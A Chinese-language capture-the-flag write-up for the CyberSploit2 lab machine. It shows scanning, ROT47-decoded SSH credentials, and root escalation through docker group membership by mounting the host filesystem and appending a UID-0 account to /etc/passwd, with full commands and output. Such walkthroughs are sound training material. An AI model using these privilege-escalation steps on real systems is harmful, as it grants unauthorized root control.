CyberSploit_2靶机

信息收集

┌──(kali㉿kali)-[~/Documents/CyberSploit2]
└─$ sudo nmap --min-rate 10000 -p- 192.168.1.105

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:F3:2C:38 (Oracle VirtualBox virtual NIC)

开放了 22, 80 端口

┌──(kali㉿kali)-[~/Documents/CyberSploit2]
└─$ sudo nmap -sT -sV -sC -O -p22,80 192.168.1.105

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey: 
|   3072 ad:6d:15:e7:44:e9:7b:b8:59:09:19:5c:bd:d6:6b:10 (RSA)
|   256 d6:d5:b4:5d:8d:f9:5e:6f:3a:31:ad:81:80:34:9b:12 (ECDSA)
|_  256 69:79:4f:8c:90:e9:43:6c:17:f7:31:e8:ff:87:05:31 (ED25519)
80/tcp open  http    Apache httpd 2.4.37 ((centos))
|_http-title: CyberSploit2
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.37 (centos)
MAC Address: 08:00:27:F3:2C:38 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

脚本发现网站没有屏蔽有风险的 TRACE 方法，尝试了一下，没发现多少有价值的信息。看看网页

再看看网站源码

网站源码中有注释 ROT47 ，而观察网页中，有一对数据比较奇怪

D92:=6?5C2 	4J36CDA=@:E`

尝试使用 ROT47

对两个字符串都进行处理，得到 shailendra:cybersploit1

ssh 登录

尝试使用此口令进行 ssh 登录

┌──(kali㉿kali)-[~/Documents/CyberSploit2]
└─$ ssh shailendra@192.168.1.105           
The authenticity of host '192.168.1.105 (192.168.1.105)' can\'t be established.
ED25519 key fingerprint is SHA256:Ua5bYFU7jRE2PNF3w1hs2yrzHmyU7Q3FWj0xvMKZDro.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.1.105' (ED25519) to the list of known hosts.
shailendra@192.168.1.105\'s password: 
Last login: Wed Jul 15 12:32:09 2020
[shailendra@localhost ~]$ whoami
shailendra
[shailendra@localhost ~]$ id
uid=1001(shailendra) gid=1001(shailendra) groups=1001(shailendra),991(docker) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[shailendra@localhost ~]$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 08:00:27:f3:2c:38 brd ff:ff:ff:ff:ff:ff
    inet 192.168.1.105/24 brd 192.168.1.255 scope global dynamic noprefixroute enp0s3
       valid_lft 367sec preferred_lft 367sec
    inet6 fe80::2128:7b5:cf42:2c22/64 scope link noprefixroute 
       valid_lft forever preferred_lft forever
3: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default 
    link/ether 02:42:da:26:3c:36 brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
       valid_lft forever preferred_lft forever
[shailendra@localhost ~]$ uname -a
Linux localhost.localdomain 4.18.0-193.6.3.el8_2.x86_64 #1 SMP Wed Jun 10 11:09:32 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
[shailendra@localhost ~]$ sudo -l
[sudo] password for shailendra: 
Sorry, user shailendra may not run sudo on localhost.

立足点找到了，看看家目录文件

[shailendra@localhost ~]$ ls -liah
total 20K
8409252 drwx------. 2 shailendra shailendra  99 Jul 15  2020 .
8896212 drwxr-xr-x. 4 root       root        38 Jul 15  2020 ..
8409248 -rw-------. 1 shailendra shailendra 612 Jul 15  2020 .bash_history
9515438 -rw-r--r--. 1 shailendra shailendra  18 Nov  8  2019 .bash_logout
9515454 -rw-r--r--. 1 shailendra shailendra 141 Nov  8  2019 .bash_profile
9515455 -rw-r--r--. 1 shailendra shailendra 312 Nov  8  2019 .bashrc
8427883 -rw-rw-r--. 1 shailendra shailendra   7 Jul 15  2020 hint.txt

有个特殊的文本文件，查看

[shailendra@localhost ~]$ cat hint.txt 
docker
[shailendra@localhost ~]$ cat .bash_history
ifconfig 
whoami
pwd
cat /etc/shadow
su
cd
id
docker run -it /bin/bash busybox
docker run busybox -it /bin/bash 
is
id
docker image ls
docker exec -i -t c7 /bin/bash
docker exec -i -t busybox /bin/bash
docker image ls
id
docker run -it busybox
su
docker iamge ls
ls
cd
pwd
ls
cd .
cd ..
pwd
ls
pwd
cat /etc/passwd
cat /etc/shadow
su
cd
pwd
ls
cd
su
cd
ls
pwd
ll
cd /home/
ls
cat docker > hint.txt
sudo cat docker > hint.txt
ls
cd shailendra
ll
echo docker > hint.txt
ls
cat hint.txt 
docker -v
docker image ls
docker run busybox -it
docker run -i -t busybox
ls
cd 
ls
cat hint.txt 
ls
cd
pwd
ls
cd
su shailendra

结合 bash 历史记录和 hint.txt 猜测提权必须经过 docker

提权

谷歌搜索一下这个版本是否有 exp

仔细观察 GitHub 上的项目flast101/docker-privesc: Privilege escalation in Docker (github.com)

结合博客文章，判断出：常常会出现普通用户拥有 docker 的运行权限的情况，而在实际的环境中，有时候我们需要挂载主机上的目录来持久化数据（docker 容器被删除后，数据也就消失了），而 docker 组的成员在容器中是有 root 权限的。所以我们可以挂载主机上的 passwd 文件来添加新的 root 用户。这里有两种手法，第一种是只为了获取 flag 文件，第二种是真正获取 root 权限。

但都需要面对一个问题：如果无法访问互联网，我们如何获取到 docker 镜像（本台靶机中 docker 镜像为空）

[shailendra@localhost tmp]$ docker image ls
REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE

首先我们需要在本机 pull 一个镜像，并将其导出

┌──(kali㉿kali)-[~/Documents/CyberSploit2]
└─$ docker pull busybox         
Using default tag: latest
latest: Pulling from library/busybox
5cc84ad355aa: Pull complete 
Digest: sha256:5acba83a746c7608ed544dc1533b87c737a0b0fb730301639a0179f9344b1678
Status: Downloaded newer image for busybox:latest
docker.io/library/busybox:latest

┌──(kali㉿kali)-[~/Documents/CyberSploit2]
└─$ docker save -o busybox.tar busybox

┌──(kali㉿kali)-[~/Documents/CyberSploit2]
└─$ ls      
busybox.tar  docker-privesc.sh  linpeas.sh  pspy64

将 busybox.tar 上传到靶机，导入

[shailendra@localhost tmp]$ docker load -i busybox.tar
01fd6df81c8e: Loading layer [==================================================>]  1.459MB/1.459MB
Loaded image: busybox:latest
[shailendra@localhost tmp]$ docker images
REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
busybox             latest              beae173ccac6        21 months ago       1.24MB

获取 flag 文件

docker run -v /:/mnt --rm -it busybox chroot /mnt sh

在 Docker 中以交互模式运行一个基于 BusyBox 镜像的容器，并在容器内部执行 chroot /mnt sh 命令。该命令会将容器的根目录更改为宿主机的根目录，并在容器内启动一个新的 shell。这样可以在容器中模拟宿主机的根文件系统环境。运行结束后，由于使用了 --rm 选项，容器会被自动删除

[shailendra@localhost tmp]$ docker run -v /:/mnt --rm -it busybox chroot /mnt sh
sh-4.4# whoami
root
sh-4.4# id
uid=0(root) gid=0(root) groups=0(root),10(wheel) context=system_u:system_r:spc_t:s0
sh-4.4# pwd
/
sh-4.4# uname -a
Linux e3da56f527e7 4.18.0-193.6.3.el8_2.x86_64 #1 SMP Wed Jun 10 11:09:32 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
sh-4.4# cd /root
sh-4.4# ls
anaconda-ks.cfg  flag.txt  get-docker.sh  logs}

获取 root 权限

与只获取 flag 不同，我们如果想获取 root 权限，需要对敏感文件进行修改，这里修改的对象是 passwd 文件，先生成密码哈希

[shailendra@localhost tmp]$ openssl passwd -1 -salt evil newrootpass
$1$evil$eu2ySQGNgNghQm4ASTnKa.
[shailendra@localhost tmp]$ echo 'newroot:$1$evil$eu2ySQGNgNghQm4ASTnKa.:0:0:root:/root:/bin/bash' >new_account

接下来使得主机的根目录与容器的 /mnt 目录进行挂载，然后以交互模式运行一个 shell，并将 /mnt/tmp/new_account 文件的内容追加到容器内的 /mnt/etc/passwd 文件中

[shailendra@localhost tmp]$ docker run -tid -v /:/mnt/ --name flast101.github.io busybox
fc616c718ce6cc4f11a7429399b264c4b8719bf56fef4e7848a7149ac8e555f0
[shailendra@localhost tmp]$ docker exec -ti flast101.github.io sh -c "cat /mnt/tmp/new_account >> /mnt/etc/passwd"
//清理
//docker rm -f flast101.github.io
//docker image rm busybox
//rm /tmp/new_account
[shailendra@localhost tmp]$ su newroot
Password: 
[root@localhost tmp]# whoami
root
[root@localhost tmp]# id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[root@localhost tmp]# uname -a
Linux localhost.localdomain 4.18.0-193.6.3.el8_2.x86_64 #1 SMP Wed Jun 10 11:09:32 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

有网的情况只需要直接执行 flast101/docker-privesc: Privilege escalation in Docker (github.com) 中的 docker-privesc.sh 脚本即可